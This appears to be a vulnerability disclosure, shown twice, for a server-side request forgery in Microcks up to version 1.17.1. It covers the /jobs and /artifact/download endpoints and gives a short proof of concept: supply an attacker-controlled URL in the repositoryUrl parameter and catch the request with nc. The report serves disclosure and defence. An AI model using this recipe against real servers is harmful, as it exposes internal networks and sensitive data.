b33t1e/Microcks SSRF

## Microcks SSRF
[description]
Microcks up to 1.17.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.
>
------------------------------------------
>
[Vulnerability Type]
Server-Side Request Forgery (SSRF)
>
------------------------------------------
>
[Vendor of Product]
https://github.com/microcks/microcks
>
------------------------------------------
>
[Affected Product Code Base]
microcks <= Version 1.17.1
>
------------------------------------------
>
[Affected Component]
The API endpoints /jobs and /artifact/download are vulnerable to Server-Side Request Forgery (SSRF) attacks via the repositoryUrl and url parameter.
>
------------------------------------------
>
[Attack Type]
Remote
>
------------------------------------------
>
[Impact Escalation of Privileges]
true
>
------------------------------------------
>
[Impact Information Disclosure]
true
>
------------------------------------------
>
[Attack Vectors]
POC: 1. create a job with "http://ip:port/ssrf_test" in repositoryUrl parameter. 2. use nc to listen on ip:port. 3. when job created, nc will receive request.
details can be seen: https://github.com/orgs/microcks/discussions/892
>
------------------------------------------
>
[Discoverer]
beet1e
>
------------------------------------------
>
[Reference]
https://github.com/microcks/microcks
https://github.com/orgs/microcks/discussions/892
	[description]
	Microcks up to 1.17.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.
	>
	------------------------------------------
	>
	[Vulnerability Type]
	Server-Side Request Forgery (SSRF)
	>
	------------------------------------------
	>
	[Vendor of Product]
	https://github.com/microcks/microcks
	>
	------------------------------------------
	>
	[Affected Product Code Base]
	microcks <= Version 1.17.1
	>
	------------------------------------------
	>
	[Affected Component]
	The API endpoints /jobs and /artifact/download are vulnerable to Server-Side Request Forgery (SSRF) attacks via the repositoryUrl and url parameter.
	>
	------------------------------------------
	>
	[Attack Type]
	Remote
	>
	------------------------------------------
	>
	[Impact Escalation of Privileges]
	true
	>
	------------------------------------------
	>
	[Impact Information Disclosure]
	true
	>
	------------------------------------------
	>
	[Attack Vectors]
	POC: 1. create a job with "http://ip:port/ssrf_test" in repositoryUrl parameter. 2. use nc to listen on ip:port. 3. when job created, nc will receive request.
	details can be seen: https://github.com/orgs/microcks/discussions/892
	>
	------------------------------------------
	>
	[Discoverer]
	beet1e
	>
	------------------------------------------
	>
	[Reference]
	https://github.com/microcks/microcks
	https://github.com/orgs/microcks/discussions/892